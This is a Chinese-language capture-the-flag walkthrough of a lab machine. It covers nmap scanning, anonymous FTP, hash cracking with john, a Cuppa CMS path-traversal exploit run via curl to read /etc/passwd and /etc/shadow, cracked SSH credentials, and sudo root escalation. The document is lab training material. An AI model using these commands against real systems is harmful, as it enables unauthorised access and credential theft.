1.信息搜集

sudo nmap -sn 192.168.80.0/24

(不使用root权限，防止靶机恶意代码对kali机器底层代码进行修改)

-sn 在主机发现后不进行端口扫描，只打印可用主机,允许对目标网络进行轻量级侦察不被发现

-sL 列表扫描

端口探测

sudo nmap -sT --min-rate 10000 -p- 192.168.80.137 -oA /home/kali/nmapscan/ports 

扫描技术

-sS 利用tcp的syn标志位对端口进行探测，发送syn包只建立tcp链接的第一步，获得反馈之后进行下一步

因为只发送了协议的一部分，所以会被防火墙过滤

-sT 利用三次握手过程来进行端口探测，发送完整的tcp连接请求来进行探测，更准确，也不会被防火墙过滤

--min-rate 最慢扫描每秒多少次，红队中不能太多，会被发现

-p- 1-65535端口进行扫描

-oA 用三种格式记录扫描结果

查看扫描结果

ls -liah /home/kali/nmapscan

单独输出端口

grep open /home/kali/nmapscan/ports.nmap 

单独打印

grep open /home/kali/nmapscan/ports.nmap | awk -F'/' '{print $1}'  

grep open /home/kali/nmapscan/ports.nmap | awk -F'/' '{print $1}' |paste -sd ','

-F 在指定哪一行

-sd 指定用什么分隔符

变量指定数据

ports=$(grep open /home/kali/nmapscan/ports.nmap | awk -F'/' '{print $1}' |paste -sd ',')

详细信息扫描

sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.80.137 -oA /home/kali/nmapscan/detail
​

-sV 探测各服务版本

-sC 使用默认脚本进行扫描

-O 扫描操作系统版本

-p 确定扫描端口

UDP扫描

sudo nmap -sU --top-ports 20 192.168.80.137 -oA /home/kali/nmapscan/udp

-sU 指定进行udp扫描

--top-prots 对常用的20个端口进行扫描

扫描结果，top20的端口都是悬疑状态

默认脚本扫描

sudo nmap --script=vuln -p21,22,80,3306 192.168.80.137 -oA /home/kali/nmapscan/vuln

--scrip=vuln nmap的漏洞脚本目录

信息总结

端口扫描

21 ftp 中可能存在信息泄露，或者应用程序漏洞

22 ssh不先考虑 可能用到爆破

80 最可能解决的

3306 数据库默认端口，可以尝试用弱密码登录

漏洞扫描

漏洞扫描的结果

21，22都没什么特别有用的信息

80 dos 攻击基本不会选，没有技术含量

没有找到xss漏洞

3306 没有什么漏洞

如果什么都没有看看ipv6

完成nmp四大扫描

2.漏洞寻找

21端口，ftp匿名登陆

匿名登陆 用户名为anonymous 密码为空

进到ftp中使用二进制模式，否则可执行命令会出错

prompt 关闭交互式命令免得下载文件需要重复执行yes

mget  下载命令

切换回上级目录

进入docs 目录查看信息，mget下载worktodo.txt文件

切换回上一级目录，下载最后一个目录的文件

FTP渗透

查看下载下来的五个文件

cat *  读取多个文件

如果不知道被加密信息用的是哪种加密算法，可以使用工具hash-identifier

md5加密

编辑文件把密码塞入，用john进行解密

浏览器破解

到最后也没啥有用信息

查看80端口信息

没有什么有用信息

尝试对目录进行爆破，获取更多信息

尝试登陆

没有发现什么可以进行反弹shell的机会

查看服务，框架之类的有没有漏洞

下载漏洞

按照漏洞使用说明进行利用

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

漏洞分析 是因为没有对post请求进行任何处理造成的（倒数第三行）

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.80.137/administrator/alerts/alertConfigField.php

使用post的方式进行传输

在现在linux系统中，passwd文件里面所有账户的密码都是用x代替的，真正的密码（加密后）放在/etc/shadow中，同样的curl方法，我们改一下参数，看看etc/shadow

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.80.137/administrator/alerts/alertConfigField.php

将加密账号密码写入记事本，使用john进行密码破解

解密结果 账号w1r3s 密码computer

ssh远程登录

ssh w1r3s@192.168.80.137

shoami
uname -a
id
sudo -l 查看当前用户都有什么权限

可以看到所有权限都是ALL

w1r3 拥有所有权限

所以可以使用sudo su直接进行提权

或者

sudo /bin/bash  启动bash会话

flag通常在root目录下面

cd进入root目录

cat flag.txt